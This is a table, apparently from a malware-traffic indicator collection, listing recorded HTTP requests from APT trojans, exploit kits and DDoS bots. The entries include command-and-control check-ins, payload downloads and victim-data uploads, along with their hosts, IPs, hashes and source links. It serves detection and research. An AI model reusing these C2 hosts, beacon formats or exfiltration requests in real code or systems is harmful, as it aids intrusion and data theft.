174 | 2013-04-28 | APT | Banechant 1 | GET | /IGKKT | /IGKKT | Accept: 1 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0. 50727) Host: ow.ly Connection: Keep-Alive . . . . Error 301, implicitly redirects to malicious site HTTP/1.1 301 Moved Permanently Date: Fri, 15 Mar 2013 16:31:20 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5. 3. 2-1ubuntu4. 18 set-cookie: OWLYSID=f6f604d22494a738706d64353e3536d91c5d69e1; path=/ | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0. 50727) | http://www.fireeye.com/blog/technical/malware-research/2013/04/trojan-apt-banechant-in-memory-trojan-that-observes-for-multiple-mouse-clicks.html | 2013-04 | |||||||
175 | 2013-04-28 | APT | Banechant payload dl 2 | GET | /adserv/logo.jpg HTTP /1.1 | /logo.jpg | Accept: image/jpeg User-Agent:Mozilla/4.0 (compatible; MS1E 6.0; Windows NT 5.1; Sv2) Connection: Keep-Alive host: . symbisecure.com | Mozilla/4.0 (compatible; MS1E 6.0; Windows NT 5.1; Sv2) | http://www.fireeye.com/blog/technical/malware-research/2013/04/trojan-apt-banechant-in-memory-trojan-that-observes-for-multiple-mouse-clicks.html | 2013-04 | |||||||
176 | 2013-04-28 | APT | Beebus | GET | /windosdate/v6/default.aspx?ln=en-us | /v6/default.aspx?ln=en-us | User-Agent: Mozilla/4.0 (compatible; ) Accept: / Host: update.microsoft.com Cookie: WC1=V=3&GUID=afe1e295d3c94b2ca137abc405a63a57 | Mozilla/4.0 (compatible; ) | Beebus initial request | http://www.fireeye.com/blog/technical/targeted-attack/2013/02/operation-beebus.html | 2013-02 | ||||||
177 | 2013-04-28 | APT | Beebus C2 checkin | GET | /s/asp?XAAAAM4w5jmIa_kMZlr67o8jettxsYA8dZge NAHes-Nn5p-6AFUD6yncpz5AL6wAAA==p=1 | /s/asp?XAAAAM | /s/asp?XAAAAM4w5jmIa_kMZlr67o8jettxsYA8dZgeNAHes-Nn5p-6AFUD6yncpz5AL6wAAA==p=1 User-Agent: Mozilla/4.0 (compatible; ) Accept: / Host: 68.96.31.136 | Mozilla/4.0 (compatible; ) | Beebus C2 checkin | d7ec457be3fad8057580e07cae74becb | http://www.fireeye.com/blog/technical/targeted-attack/2013/02/operation-beebus.html | http://contagioexchange.blogspot.com/2013/08/beebus-warp-strings-apt.html | 2011-09 | ||||
178 | 2013-04-28 | APT | Beebus C2 checkin | GET | /s/asp?XAAAAM4w5jmOS_kMZlr67o8jettxsYA8d ZgeNAHes-Nn5p-6AFUD6yncpz5AL6wAAA==p=1 | /s/asp?XAAAAM | User-Agent: Mozilla/4.0 (compatible; ) Accept: / Host: bee.businessconsults.net | Mozilla/4.0 (compatible; ) | Beebus C2 checkin | 7ed557921ac60dfcb295ebabfd972301 | http://www.fireeye.com/blog/technical/targeted-attack/2013/02/operation-beebus.html | http://contagioexchange.blogspot.com/2013/08/beebus-warp-strings-apt.html | 2011-04 | ||||
179 | 2013-04-28 | APT | Beebus data send | POST | /s/asp?__ uLBwO1bAMKBgG2BQAAAAEAAAACAAAAAAAAAG9zYW11 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA VwBJAE4ARABPAFcAUwBNAEEAQQBOAEU AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAA==p=2 | /s/asp?__u | User-Agent: Mozilla/4.0 (compatible; ) Accept: / Host: Content-Length: 563 Connection: Keep-Alive Cache-Control: no-cache | Mozilla/4.0 (compatible; ) | Beebus data send | http://contagioexchange.blogspot.com/2013/08/beebus-warp-strings-apt.html | |||||||
180 | 2013-04-28 | CRIME EK | Blackhole 2 | GET | /fded177fe12651bb038f3f11b01c4168/q.php | /q.php | /fded177fe12651bb038f3f11b01c4168/q.php Accept: text/html, application/xhtml+xml, / Referer: http://www.jobs-located-near.com/Lanoka%20Harbor/NJ/08734/Internship/ Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: 193.93.248.227 Connection: Keep-Alive | victim UA | compromised site - malvertising on www.jobs-located-near.com redirects to BH landing page via iframe | http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_blackhole-exploit-kit.pdf http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html | 2013-04 | ||||||
181 | 2013-04-28 | APT | Cookies /Cookiebag / Dalbot | GET | /1799.asp | /1799.asp | Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: usnftc.org Connection: Keep-Alive Cookie: CAQGBgoFD1YaHA4ZH1AIBwIOBR8ADhJWWV5bX1ADBBgfBQoGDlYmKic8KjkuIz4lPy45UA== 'command=qwert;clientkey=2504;hostname=MALWAREHUNTER;' | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) | Decoded string is shown in Figure 8, where the decoded string includes the command request, the clientkey (which is a decimal value selected at program startup), and the compromised host’s name. | 0C28AD34F90950BC784339EC9F50D288 | http://intelreport.mandiant.com/ | http://bit.ly/aptpcaps | http://contagioexchange.blogspot.com/2013/08/cookies-cookiebag-dalbot-strings-apt-2.html http://contagioexchange.blogspot.com/2013/08/cookies-cookiebag-dalbot-strings-apt-1.html | 2012-08 | |||
182 | 2013-04-28 | APT | Cookies /Cookiebag / Dalbot | GET | /3961.html Cookie: Y29tbWFuZD1HZXRDb21tYW5kO2NsaWVudGtle T0zOTU0 O2hvc3RuYW1lPXZpY3RpbTs= | Cookie: Y29tbWFuZD1HZXRDb21tYW5kO2NsaWVudGtleT0zOTU0O2hvc3RuYW1lPXZpY3RpbTs= User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Host: 216.62.168.251:8080 Connection: Keep-Alive | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; | 8080 | 2c4cabb4ca19ddf87c7f11bad44bdf05 | http://www.cyberengineeringservices.com/trojan-cookies/ | http://bit.ly/aptpcaps | http://contagioexchange.blogspot.com/2013/08/cookies-cookiebag-dalbot-strings-apt-2.html http://contagioexchange.blogspot.com/2013/08/cookies-cookiebag-dalbot-strings-apt-1.html | 2011-09 | ||||
183 | 2013-04-28 | APT | Cookies /Cookiebag / Dalbot | GET | /8223.asp (also can be like /2007.asp,/2013.asp etc | <p>/8223.asp <p>/2007.asp <p>/2013.asp | /8223.asp Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Host: 1.234.1.68 Connection: Keep-Alive Cookie: CAQGBgoFD1YaHA4ZH1AIBwIOBR8ADhJWU1pcXlADBBgfBQoGDlYDCgUeDgcORgkIXVtcWVtQ | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) | 9b6692295fadf24b512d5f63e4f74d15 | http://labs.alienvault.com/labs/index.php/2012/unveiling-a-spearphishing-campaign-and-possible-ramifications/ | http://bit.ly/aptpcaps | http://contagioexchange.blogspot.com/2013/08/cookies-cookiebag-dalbot-strings-apt-2.html http://contagioexchange.blogspot.com/2013/08/cookies-cookiebag-dalbot-strings-apt-1.html | 2012-10 | ||||
184 | 2013-04-28 | APT | Cookies /Cookiebag / Dalbot | GET | /indexs.zip | /indexs.zip | /indexs.zip Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) Host: 117.55.241.58 Connection: Keep-Alive | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) | 840BD11343D140916F45223BA05ABACB | http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html | http://bit.ly/aptpcaps | http://contagioexchange.blogspot.com/2013/08/cookies-cookiebag-dalbot-strings-apt-2.html http://contagioexchange.blogspot.com/2013/08/cookies-cookiebag-dalbot-strings-apt-1.html | 2012-01 | ||||
185 | 2013-04-28 | APT | Coswid | GET | /old/google.png | /google.png | Accept: . . . . . , User-Agent: [redacted] fcfea+Mozilla/4.0 (compatible; MSIE 8.0; win32) Host: firstwillnessclub.com | [redacted] fcfea+Mozilla/4.0 (compatible; MSIE 8.0; win32) | 726ef24b8eff4c4121c73861756fb9a3 a4ba6540520c375875bf46cf8e19cb7d 09fd067b6d944bf111857f6f60b7471e | http://labs.alienvault.com/labs/index.php/category/blog/snort-blog/page/2/ | http://contagioexchange.blogspot.com/2013/08/coswid-strings-apt.html | 2012-05 | |||||
186 | 2013-04-28 | APT | CVE-2012-0754 SWF in DOC | GET | /test.mp4 | Accept: / Accept-Language: en-US x-flash-version: 11,1,102,55 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1) Host: 208.115.230.76 Connection: Keep-Alive | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1) | SWF request | E92A4FC283EB2802AD6D0E24C7FCC857 | http://contagiodump.blogspot.com/2012/03/mar-2-cve-2012-0754-irans-oil-and.html | 2012-05 | ||||||
187 | 2013-04-28 | APT | CVE-2012-0779 | GET | /essais.swf?info=789c333230d13331d53337d63 3b3b432313106001afa0338&infosize=00FC0000 | /essais.swf? | Accept: / User-Agent: contype Host: 204.45.73.69 | contype | 1750A38A44151493B675538A1AC2070B | http://contagiodump.blogspot.com/2012/05/may-3-cve-2012-0779-world-uyghur.html | 2012-05 | ||||||
188 | 2013-04-28 | CRIME | Darkmegi | GET | /20111230.jpg | /20111230.jpg | /20111230.jpg Host: images.hananren.com User-Agent: Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+.NET+CLR+2.0.50727) Cache-Control: no-cache | Mozilla/4.0+(compatible;+MSIE+6.0; +Windows+NT+5.1;+SV1;+ .NET+CLR+2.0.50727) | 6C8F9658A390C24A9F4551DC15063927 | http://contagiodump.blogspot.com/2012/04/this-is-darkmegie-rootkit-sample-kindly.html | 2012-04 | ||||||
189 | 2013-04-28 | CRIME | Darkness DDos v8g | GET | /index.php?uid=587609&ver=8g%20XP | /index.php?uid= | /index.php?uid=587609&ver=8g%20XP HTTP/1.0 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Host: vkotalke.info Pragma: no-cache | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) | F03Bc8Dcc090607F38Ffb3A36Ccacf48 | http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html | http://bit.ly/crimepcaps | 2011-01 | |||||
190 | 2013-04-28 | APT | Depyot | GET | /new/3d/d/pdf.php?id=2 | /3d/d/pdf.php?id= | /new/3d/d/pdf .php?id=2 HTTP/1. 1 User-Agent: Mozilla/4.0 (compatible) Host: www.3dvideo. ru Cache-Control: no-cache | Mozilla/4.0 (compatible) | stage 1 payload | 651fad35d276e5dedc56dfe7f3b5f125 | http://www.fireeye.com/blog/technical/targeted-attack/2013/03/internet-explorer-8-exploit-found-in-watering-hole-campaign-targeting-chinese-dissidents.html | 2013-03 | |||||
191 | 2013-04-28 | APT | Destory Rat / Sogu / Thoper | POST | /update?id=000f6b50 | /update?id= | /update?id=000f6b50 Accept: / X-Session: 0 X-Status: 0 X-Size: 61456 X-Sn: 1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1; .NET CLR 1.1.4322; .NET CLR1.0.3705) Host: exchange.likescandy.com Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; . NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1; .NET CLR | 09B8B54F78A10C435CD319070AA13C28 | http://labs.alienvault.com/labs/index.php/2012/the-connection-between-the-plugx-chinese-gang-and-the-latest-internet-explorer-zeroday/ | 2012-09 | ||||||
192 | 2013-04-28 | APT | Destory Rat / Sogu / Thoper | POST | /update?id=3109c2a2 | /update?id= | /update?id=3109c2a2 Accept: / X-Session: 0 X-Status: 0 X-Size: 61456 X-Sn: 1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;) Host: path.alyac.org Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1; | Both variants are associated with the Destory RAT family of malware that dates back at least as far as January 2007 | http://www.commandfive.com/papers/C5_APT_C2InTheFifthDomain.pdf | 2012-02 | ||||||
193 | 2013-04-28 | APT | Destory Rat / Sogu / Thoper | POST | /update?product=windows | /update?product=windows | /update?product=windows Accept: / X-Session: 0 X-Status: 0 X-Size: 61456 X-Sn: 1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1; | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1; | Update communications. The format of Variant A is identical to the communications generated by the Destory RAT used in the SK Communications hack http://www.commandfive.com/papers/C5_APT_SKHack.pdf | http://www.commandfive.com/papers/C5_APT_C2InTheFifthDomain.pdf | 2012-02 | ||||||
194 | 2013-04-28 | CRIME | DirtJumper DDoS | POST | /678/index.php | /index.php | /678/index.php HTTP/1.0 Host: asdaddddaaaa.com Keep-Alive: 300 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Content-Type: application/x-www-form-urlencoded Content-Length: 17 k=426924814555748 | Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) | http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html | 2011-10 | |||||||
195 | 2013-04-28 | CRIME | Dirtjumper ddos | POST | /boi854tr4w.php | /boi854tr4w.php | /boi854tr4w.php HTTP/1.0 Host: coppercreek.ru Accept: / Accept-Encoding: identity, ;q=0 Content-Length: 269 Connection: close Content-Type: application/octet-stream Content-Encoding: binary User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98) | Mozilla/4.0 (compatible; MSIE 5.0; Windows 98) | http://blog.shadowserver.org/page/3/ | 2012-08 | |||||||
196 | 2013-04-28 | CRIME | DNSChanger | POST | /d56sc1d56scd56sc1.php?ini= v22Mmjy0SYXyWTI0tQ0QQOdqOb68 J9I6ModWQnN1eE1VXw/T3BWOyTujBlrHIQqMgMqV75 0QegiB MF4XAHPzbYqRtufQpaX/M/trvO7ukg== | /d56sc1d56scd56sc1.php?ini=v22Mmjy0SYXyWTI0tQ0QQOdqOb68J9I6ModWQnN1eE1VXw/T3BWOyTujBlrHIQqMgMqV750QegiBMF4XAHPzbYqRtufQpaX/M/trvO7ukg== Content-Type: application/x-www-form-urlencoded Host: borderspot.net User-Agent: Mozilla/6.0 (Windows; w3.0) Content-Length: 193 Connection: close Cache-Control: no-cache data=qSrTzGL0RMCyDnY9+xJEQe5nNLundsMqfdgBGzUoJ0xVTU/DzQWC3DLbXB/UfETT1o6F2ZIbLEGVJ0MOJTSDP9PX4aSS/OagY6143bGp0y/uGVSLVL0u+uo+x5NraqI7DJaKGg7TCqXkTszGInUBxiK1/hKL2oFYpjsSeY04x+zt2a9dO+UI5VhP0W45 | Mozilla/6.0 (Windows; w3.0) | http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html | http://bit.ly/crimepcaps | 2011-12 | |||||||
197 | 2013-04-28 | APT | Downloader BMP | GET | /images/evil.bmp | /evil.bmp | /images/evil.bmp User-Agent: Mozilla/4.0 (compatible; MSIE 8.0 ;Windows NT 6.1; U.S. ) 4IRh2K1I3Zl=O Host: www.badsite4you.com Cache-Control: no-cache | Mozilla/4.0 (compatible; MSIE 8.0 ;Windows NT 6.1; U.S. ) | See the article: The data in red is hard coded into the sample’s binary. The data that is highlighted in yellow is the encoded host name (in this example: victim). Original Encoded String - 4IRh2K1I3Zl Decoded String - D+LJDbLR Letters Switched - R+LJDbLD Decoded String - victim | d166a59e71535a42267e9fa993ca8e7e | http://www.cyberengineeringservices.com/downloader-bmp/ | 2012-05 | |||||
198 | 2013-04-28 | APT | Einstein | GET | /gttfi.php?id=019451425260376469&ext =YmFkc3R1ZmYuZGxs | /gttfi.php?id= | / gttfi.php?id=019451425260376469&ext=YmFkc3R1ZmYuZGxs User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: family.mobwork.net Connection: Keep-Alive Cache-Control: no-cache | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) | 1c2dfd36ad8cad978a0859d459f10326 | http://www.cyberengineeringservices.com/trojan-matryoshka-and-trojan-einstein/ | 2011-08 | ||||||
199 | 2013-04-28 | APT | Einstein data send | POST | /gttfi.php?id=019451425260376469& ext=ixioJXXJFCRrrDatKHhK | /gttfi.php?id= | / gttfi.php?id=019451425260376469&ext=ixioJXXJFCRrrDatKHhK Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: family.mobwork.net Content-Length: 420 Connection: Keep-Alive Cache-Control: no-cache | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) | send filename if exists | 1c2dfd36ad8cad978a0859d459f10326 | http://www.cyberengineeringservices.com/trojan-matryoshka-and-trojan-einstein/ | 2011-08 | |||||
200 | 2013-04-28 | CRIME EK | EK - Blackhole 2 landing | GET | /news/default-php-version.php?mdm=30:1g:2v:1f:1o& xguc= 3b:3i:39: 35&nze=1l:1f:30:1l:2v:30:1m:2v:1n:30&bhn=lixvdd | /default-php-version.php?mdm= | Accept: / Accept-Language: en-US Referer: http://autorepairgreeley.info/news/default-php-version.php x-flash-version: 10,1,53,64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) Host: autorepairgreeley.info Connection: Keep-Alive | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) | http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html | http://bit.ly/crimepcaps | 7/27/2013 | ||||||
201 | 2013-04-28 | CRIME EK | EK Blackhole 1 | GET | /showthread.php?t=d7ad916d1c0396ff | /showthread.php?t= | Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, / Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1) Host: 88.85.99.44:8080 Connection: Keep-Alive | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1) | 8080 | http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html | http://bit.ly/crimepcaps | 2012-03 | |||||
202 | 2013-04-28 | CRIME EK | EK Phoenix | GET | /navigator/jueoaritjuir.php | /jueoaritjuir.php | Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, / Accept-Language: ru Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Host: 78.83.233.242:8080 Connection: Keep-Alive | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html | 2012-04 | |||||||
203 | 2013-04-28 | APT | Enfal / Lurid | GET | /oi2c/wlc3/ [reducted]:00-00-00-00-00-00/ij83d | /wlc3/ | Host: home. coffeeibus . com Cache-Control: no-cache | New Enfal checks if commands have been specified | http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf | http://bit.ly/aptpcaps | 2012 | ||||||
204 | 2013-04-28 | APT | Enfal / Lurid | GET | /trandocs/nm/.[reducted] :00-00-00-00-00-00lCrrrwhite | /nm/ | Host: note.webmail-temp.com Cache-Control: no-cache | Enfal checks if commands have been specified | http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf | http://bit.ly/aptpcaps | 2012 | ||||||
205 | 2013-04-28 | APT | Enfal / Lurid | POST | /cgi-bin/CMS_SubitAll.cgi | /CMS_SubitAll.cgi | Host: virustotel.3-a.net Content-Length: 115 Cache-Control: no-cache | New Enfal POSTs the victim’s details to the C&C server | http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf | http://bit.ly/aptpcaps | 2012 | ||||||
206 | 2013-04-28 | APT | Enfal / Lurid | POST | /cgl-bin/Owpq4.cgi | /Owpq4.cgi | Host: note.webmail-temp.com Content-Length: 83 Cache-Control: no-cache | posts the victim’s details to the C&C server | http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf | http://bit.ly/aptpcaps | 2012 | ||||||
207 | 2013-04-28 | APT | Enfal / Lurid | POST | /Sjwpc/odw3ux | Host: hone.coffeeibus.com Content-length: 104 Cache-Control: no-cache | Original Enfal POSTs the victim’s details to the C&C server | http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf | http://bit.ly/aptpcaps | 2012 | |||||||
208 | 2013-04-28 | CRIME | Flashback OSX | GET | /statistics.html | /statistics.html | Host: cuojshtbohnt.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1; sv:2; id: 1A698BE9-0211-5EB4-AFDC-644AA479D972) Gecko/20100101 Firefox/9.0.1 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1; sv:2; id: 1A698BE9-0211-5EB4-AFDC-644AA479D972) Gecko/20100101 Firefox/9.0.1 | 5616687FAC5D040AE65CB1B08717A6AA | http://contagiodump.blogspot.com/2012/04/i-have-been-tracking-infections-too-and.html | 2012-04 | ||||||
209 | 2013-04-28 | APT | Foxy | POST | /404error.asp | /404error.asp | Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0) Host: www.gobroadreach.com Content-Length: 53 Connection: Keep-Alive Cache-Control: no-cache | Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0) | d271ae0f4e9230af3b61eafe7f671fde | http://www.cyberengineeringservices.com/364/ | 2011-08 | ||||||
210 | 2013-04-28 | APT | Foxy Checkin | GET | /images/leftnav_prog_bg.jpg | /leftnav_prog_bg.jpg | User-Agent: Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0) Host: www.gobroadreach.com Cache-Control: no-cache | Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0) | d271ae0f4e9230af3b61eafe7f671fde | http://www.cyberengineeringservices.com/364/ | 2011-08 | ||||||
211 | 2013-04-28 | APT | Gh0st ASP ver | GET | /1/v2/1oginv2.asp?hi2wsdf351&x.’..[xf)..<.3XqHr....)IL{..&y192.168.0.69 | /v2/1oginv2.asp? | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0: Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1) Host: .palms-us.org | Mozilla/4.0 (compatible; MSIE 6.0: Windows NT 5.1; SV1; .NET CLR | http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf | 2012 | |||||||
212 | 2013-04-28 | APT | Gh0st PHP ver | GET | /ld/queenfun/vl /login.php?cd2hpdGU&uU11T VEV&s&pMTkyLjE2OC4wljYS&hi2wsdf35l | /queenfun/vl /login.php? | HTTP/1 .1 User-Agent: Mozilla/4.0 (compatible; ) Accept: / Host: . ibmunion.net | Mozilla/4.0 (compatible; ) | http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf | 2012 | |||||||
213 | 2013-04-28 | APT | Gh0st v2000 var | n | v2010........f...............( ......Service Pack 2..?..|...|...|0.@.. | v2010 | v2010........f...............( ......Service Pack 2..?..|...|...|0.@..............4$..............4$..^.....|.....]...]......{l....$.0%.|.....a2.rSingleO....t.....2.........d ....j.DELLXT..............................................g...00-50-56-3C-F6-41...'....... | B1D09374006E20FA795B2E70BF566C6D | http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html | http://bit.ly/aptpcaps | 2012-08 | ||||||
214 | 2013-04-28 | APT | GoogleAdC2 | GET | /html/lost.html | /lost.html | Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E) Host: news.googleupdateservices.com Connection: Keep-Alive | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E) | The Trojan parses the HTML file data for the following content: <!-- google_adINSTRUCTION height --> So, an example of what file lost.html may contain may look like this: <!-- google_adad_heighthttp://www.reallybad.com/Trojan2.jpg height --> | 90993b5279365b204148e8b04edf477f | http://www.cyberengineeringservices.com/cve-2011-0609-payload-a-exe-analysis/ | 2011-11 | |||||
215 | 2013-04-28 | APT | GoogleAdC2 2nd stage | GET | /Trojan2.jpg | /Trojan2.jpg | Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E) Host: www.reallybad.com Connection: Keep-Alive | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E) | The downloaded file is expected to be Base64 encoded using the following custom alphabet: abhijstuDEFGHIvwxynopqr5678QRS9+/TUzklmVWXYZABCJKLMNOP01cdefg234 | 90993b5279365b204148e8b04edf477f | http://www.cyberengineeringservices.com/cve-2011-0609-payload-a-exe-analysis/ | 2011-11 | |||||
216 | 2013-04-28 | APT | Googles | GET | /sll/monica.jpg | /monica.jpg | User-Agent: Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0; Trident/4.0; =1j2CVh2s#IE6DBo6Iru; MNA) Host: www.avvmail.com Cache-Control: no-cache | Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0; Trident/4.0; Mozilla/4.0(compatible;WindowsNT5.1; MSIE8.0) Mozilla/4.0(compatible;WindowsNT5.1; MSIE7.0;Trident/4.0 | GOGGLES will periodically request a pre-configured URL, which contains encoded commands to either sleep or download and execute another URL. The GOGGLES downloader makes extensive use of data encoding and encapsulation to obscure network traffic. GOGGLES is designed to request a URL that is stored encoded in its resource section and then extract and decode a second URL from the data returned from the server. The first HTTP request’s User-Agent string will include the encoded name of the local system. Below is an example of the first HTTP request: | BF80DBF969B73790253F683CD723FD71 | http://intelreport.mandiant.com/ | 2009-07 | |||||
217 | 2013-04-28 | APT | Greencat | GET | /<HOSTNAME>/ | GET /<HOSTNAME>/ HTTP/1.1 Accept: / Pragma: no-cache Cache-Control: max-age=0 Cache-Control: no-cache Connection: Keep-Alive Computer: <HOSTNAME> User-Agent: Mozilla/4.0 Host: flash.aunewsonline.com Content-Length: <ContentLength> <HOSTNAME> Connected! | Mozilla/4.0 Mozilla/4.0(compatible;MSIE8.0; WindowsNT5.1;SV1) Mozilla/5.0 Mozilla/4.0 | GREENCAT communicates using SSL. Within the SSL tunnel the initial request | 57e79f7df13c0cb01910d0c688fcd296 | http://intelreport.mandiant.com/ | 2012-04 | ||||||
218 | 2013-04-28 | APT | Gtalk | GET | /facebook.png | /facebook.png | Accept: / Pragma: no-cache Cache-Control: max-age=0 Cache-Control: no-cache Connection: Keep-Alive Computer: <HOSTNAME> User-Agent: Mozilla/4.0 Host: flash.aunewsonline.com Content-Length: <ContentLength> <HOSTNAME> Connected! | [redacted] +Mozllla/4.0 (compatible; MSIE 8.0; Win32) | http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf | 2012 | |||||||
219 | 2013-04-28 | Hacktivism | HOIC DDoS | GET | / HTTP/1.0 | Accept: / Accept-Language: en Host: www.hoic_target_site.com | http://blog.spiderlabs.com/2012/01/hoic-ddos-analysis-and-detection.html | 2012-01 | |||||||||
220 | 2013-04-28 | CRIME | Imaut | GET | /setting.doc | /setting.doc | Host: www.yahoo.com Cache-Control: no-cache | 823e9bab188ad8cb30c14adc7e67066d | http://bit.ly/crimepcaps | ||||||||
